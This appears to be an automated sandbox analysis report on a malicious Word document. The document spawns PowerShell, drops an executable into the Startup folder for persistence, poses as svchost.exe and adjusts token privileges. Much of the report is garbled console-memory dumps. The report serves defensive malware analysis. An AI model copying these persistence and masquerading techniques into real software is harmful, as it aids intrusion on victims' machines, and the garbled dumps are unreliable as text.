Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeCode function: 13_2_010B2050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeCode function: 13_2_002D0C80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeCode function: 13_2_002D0490
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeCode function: 20_2_001D0490
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeCode function: 20_2_001D0C80
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeCode function: 21_2_002E2050
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeCode function: 30_2_00B22050
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeCode function: 30_2_00240490
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\CTF loader_es.exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winDOC@46/28@3/1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0037ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0037ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_01F1ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_01F1ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0209ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0209ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_01D3ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_01D3ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0211ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0211ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CAACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CAACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_01B8ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_01B8ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_003CACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_003CACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01E8ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01E8ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_0200ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_0200ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_025DACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_025DACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_006DACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_006DACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_0067ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_0067ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_0043ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_0043ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_01DEACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_01DEACB7 AdjustTokenPrivileges,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$lignright_companyprofile.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCBD6.tmpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P..............................t......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................T.......,u......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................$.......ou......................0......./.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................$........u......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P..............................u......................0.......;...............|.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................T........v......................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......8v......................0.......G...............".......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............................Uv......................0.......G.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................T.......~v......................0.......S.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................T........v......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......e.r._.e.s...e.x.e. .-.F.o.r.c.e..........v......................0......._............... .......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P..............................v......................0......._.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................)w......................0.......k.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................Fw......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P..............................w......................0.......w.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................w......................0.......................l.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................w......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................w......................0...............................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................x......................0...............................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P..............................{......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................1{......................0.......#.........~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P..............................{......................0......./.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P..............................{......................0......./.........~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................T........|......................0.......;...............|.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................3|......................0.......;.........~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........|......................0.......G.........~.....".......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P..............................|......................0.......G.........~.............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................X........}......................0.......S.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............................=}......................0.......S.........~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P..............................}......................0......._.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P..............................}......................0......._.........~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P............................. ~......................0.......k.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................K~......................0.......k.........~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.........~.....2.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P..............................~......................0.......w.........~.............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......G.......................0.......................l.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......i.......................0.................~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................$...............................0.................~.............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T...............................0.................~.............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............8.......T........~......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............8.......T.......3.......................0.......#.......(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............8.......X...............................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............8.......T...............................0......./.......(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............8.......$.......!.......................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............8.......T.......Q.......................0.......;.......(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......(.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............8.......................................0.......G.......(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............8.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............8............... .......................0.......S.......(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............8...............M.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............8.......$.......m.......................0......._.......(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............8.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............8.......................................0.......k.......(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......(.......2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............8.......$...............................0.......w.......(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......$.......+.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......$.......F.......................0...............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............8.......T.......q.......................0...............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......T...............................0...............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................X...............................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................X...............................0.......#.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................T.......%.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................T.......B.......................0......./.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................X.......s.......................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................X...............................0.......;.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......x.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................X...............................0.......G.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................$...............................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................$.......!.......................0.......S.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......e.r._.e.s...e.x.e. .-.F.o.r.c.e.$.......I.......................0......._.......x....... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................T.......i.......................0......._.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................T...............................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................T...............................0.......k.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......x.......2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................T...............................0.......w.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................$...............................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................$.......9.......................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................$.......b.......................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................$...............................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................#...............(.P.....x.......p.......................................0.......#.........".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....x.......p.......................................0.......#.........................".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: .."...................../...............(.P.....x.......p.......................................0......./.........".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....x.......p...............*.......................0......./.........................".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................;...............(.P.....x.......p...............V.......................0.......;.........".....|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....x.......p...............w.......................0.......;.........................".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....x.......p.......................................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................S...............(.P.....x.......p.......................................0.......S.........".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....x.......p.......................................0.......S.........................".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: .."....................._...............(.P.....x.......p...............*.......................0......._.........".....~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....x.......p...............M.......................0......._.........................".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................k...............(.P.....x.......p...............x.......................0.......k.........".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....x.......p.......................................0.......k.........................".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....x.......p.......................................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P.....x.......p.......................................0.................".....l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......p............... .......................0.................................".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....x.......p...............H.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......p...............c.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....T.......l.......................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....T.......l...............L.......................0.......#.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....T.......l...............|.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....T.......l.......................................0......./.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....T.......l.......................................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....T.......l.......................................0.......;.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......h.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....T.......l...............0.......................0.......G.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....T.......l...............\.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....T.......l...............}.......................0.......S.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......e.r._.e.s...e.x.e. .-.F.o.r.c.e.................................0......._.......h....... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....T.......l.......................................0......._.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....T.......l.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....T.......l...............%.......................0.......k.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......h.......2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....T.......l...............y.......................0.......w.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......l.......................................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......l.......................................0...............h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......l.......................................0...............h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......l.......................................0...............h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................$.......................0.......;...............|.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................B.......................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......o.......................0.......G...............".......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................................................0.......G.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................................................0......._...............~.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............................%.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................R.......................0.......k.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................p.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................:.......................0...............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................W.......................0...............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................$...............................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................$...............................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................$.......<.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................$...............................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................$...............................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................$.......C.......................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................$...............................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............................'.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................y.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......................................
